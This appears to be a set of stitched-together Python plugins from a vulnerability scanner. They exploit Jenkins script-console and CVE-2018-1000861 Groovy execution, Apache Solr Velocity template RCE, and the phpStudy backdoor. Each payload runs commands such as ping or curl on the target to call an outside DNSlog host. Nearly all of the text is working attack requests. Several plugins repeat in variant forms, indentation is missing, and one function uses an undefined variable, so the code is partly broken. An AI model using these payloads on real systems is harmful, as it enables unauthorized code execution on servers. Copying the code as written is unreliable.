def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
global resp
global resp2
DL = ClassCongregation.Dnslog() # 初始化DNSlog
DL.dns_host()
post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
DL.dns_host(), DL.dns_host())
payload = "/script"
try:
payload_url = url + payload
s = requests.session()
cookises=re.compile('.*Cookie (.*) for.*').findall(str(s.get(payload_url,timeout=6,proxies=proxies,verify=False).cookies))[0]#正则匹配获取的Cookie字符串
Headers['Content-Type']='application/x-www-form-urlencoded'
Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
Headers['Cookis']=cookises
resp = s.post(payload_url,headers=Headers, data=post_data,timeout=6,proxies=proxies, verify=False)
con = resp.text
if DL.result():
Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(url, payload_url,con,DL.dns_host())
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
Headers1=Headers
Headers1['Content-Type']='application/x-www-form-urlencoded'
payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers1).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/config"
DL = ClassCongregation.Dnslog()
payload2 = '/solr/'+name+'/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(DL.dns_host())
payload_url1 = scheme + "://" + url +":"+ str(port)+ payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
Headers2 = Headers
Headers2['Content-Type']='application/json'
resp = requests.post(payload_url1,data=payload_data,headers=Headers2,proxies=proxies, timeout=6, verify=False)
resp2 = requests.get(payload_url2, headers=Headers1, timeout=6,proxies=proxies, verify=False)
con2 = resp2.text
if DL.result() :
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(url,con2,DL.dns_host())
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
DL = ClassCongregation.Dnslog() # 初始化DNSlog
DL.dns_host()
post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
DL.dns_host(), DL.dns_host())
payload = "/script"
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
s = requests.session()
cookises = re.compile('.*Cookie (.*) for.*').findall(
str(
s.get(payload_url, timeout=6, proxies=proxies,
verify=False).cookies))[0] #正则匹配获取的Cookie字符串
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cookis': cookises
}
resp = s.post(payload_url,
headers=headers,
data=post_data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if DL.result():
Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
url, payload_url, con, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = ClassCongregation.Dnslog()
a = '''public class x {
public x(){
"curl %s".execute()
}
}''' % DL.dns_host()
payload2 = urllib.parse.quote(a) # url编码
payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
payload_url = scheme + "://" + url + ':' + str(
port) + payload1 + payload2
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept-Encoding':
'gzip, deflate',
'Accept-Language':
'en',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if DL.result():
Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
url, payload_url, con, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL = ClassCongregation.Dnslog()
commandS = ('''system("curl http://{}");''').format(DL.dns_host())
cmd = base64.b64encode(commandS.encode('utf-8'))
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '******',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Sec-Fetch-Site': 'none',
'accept-charset': cmd,
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': RandomAgent
}
s = requests.session()
resp = s.get(payload_url,
headers=headers,
timeout=5,
proxies=proxies,
verify=False)
if DL.result():
# if True:
Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
url, payload_url, headers, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL = ClassCongregation.Dnslog()
a = '''public class x {
public x(){
"curl %s".execute()
}
}''' % DL.dns_host()
payload2 = urllib.parse.quote(a) # url编码
payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
payload_url = url + payload1 + payload2
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
resp = requests.post(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if DL.result():
Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
url, payload_url, con, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
DL = ClassCongregation.Dnslog()
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
DL.dns_host())
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
if DL.result():
Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(
url, con2, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
